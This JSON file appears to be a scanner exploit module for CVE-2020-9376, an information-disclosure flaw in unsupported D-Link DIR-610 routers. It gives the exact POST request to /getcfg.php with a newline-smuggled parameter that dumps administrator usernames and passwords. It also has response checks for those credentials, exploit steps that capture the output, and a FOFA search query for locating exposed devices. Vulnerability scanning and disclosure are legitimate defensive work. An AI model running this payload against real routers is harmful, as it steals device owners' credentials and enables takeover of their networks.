{
  "Name": "D-Link Dump Credentials (CVE-2020-9376)",
  "Description": "** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.",
  "Product": "D-Link-DIR-610",
  "Homepage": "https://www.dlink.com.br/produto/dir-610/",
  "DisclosureDate": "2020-07-09",
  "Author": "itardc@163.com",
  "FofaQuery": "title=\"D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME\" && (body=\"DIR-610\" || server=\"DIR-610\")",
  "GobyQuery": "",
  "Level": "2",
  "Impact": "",
  "Recommendation": "",
  "References": [
    "https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f",
    "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182",
    "https://www.dlink.com.br/produto/dir-610/",
    "https://nvd.nist.gov/vuln/detail/CVE-2020-9376",
    "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376"
  ],
  "HasExp": true,
  "ExpParams": null,
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "data": "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1",
        "data_type": "text",
        "follow_redirect": true,
        "method": "POST",
        "header": {
          "Content-Type": "application/x-www-form-urlencoded"
        },
        "uri": "/getcfg.php"
      },
      "ResponseTest": {
        "checks": [
          {
            "bz": "",
            "operation": "==",
            "type": "item",
            "value": "200",
            "variable": "$code"
          },
          {
            "bz": "",
            "operation": "contains",
            "type": "item",
            "value": "<name>Admin</name>",
            "variable": "$body"
          },
          {
            "bz": "",
            "operation": "contains",
            "type": "item",
            "value": "</usrid>",
            "variable": "$body"
          },
          {
            "bz": "",
            "operation": "contains",
            "type": "item",
            "value": "</password>",
            "variable": "$body"
          }
        ],
        "operation": "AND",
        "type": "group"
      }
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "data": "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1",
        "data_type": "text",
        "follow_redirect": true,
        "method": "POST",
        "header": {
          "Content-Type": "application/x-www-form-urlencoded"
        },
        "uri": "/getcfg.php"
      },
      "SetVariable": [
        "output|lastbody"
      ]
    }
  ],
  "Tags": ["infoleak"],
  "CVEIDs": [
    "CVE-2020-9376"
  ],
  "CVSSScore": "7.5",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": ["D-Link-DIR-610"]
  }
}